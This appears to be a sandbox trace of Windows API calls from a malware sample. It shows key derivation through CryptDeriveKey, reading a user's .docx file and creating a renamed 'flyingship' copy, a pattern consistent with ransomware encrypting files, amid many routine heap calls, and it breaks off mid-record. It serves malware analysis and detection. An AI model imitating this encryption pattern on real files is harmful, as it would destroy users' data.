CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.478] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.478] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0180.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.479] CryptDestroyHash (hHash=0x90af58) returned 1 [0180.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzwma.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.480] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.480] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0180.480] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0180.480] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0180.481] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.481] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0180.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0180.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0180.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzwma.flyingship.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0180.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0180.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0180.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.484] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0180.484] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0180.488] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x43af, lpOverlapped=0x0) returned 1 [0180.488] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0180.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0180.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0180.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0180.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0180.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0180.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.491] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0180.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.492] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.493] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0180.493] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.493] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.493] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.494] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0180.494] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.495] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: 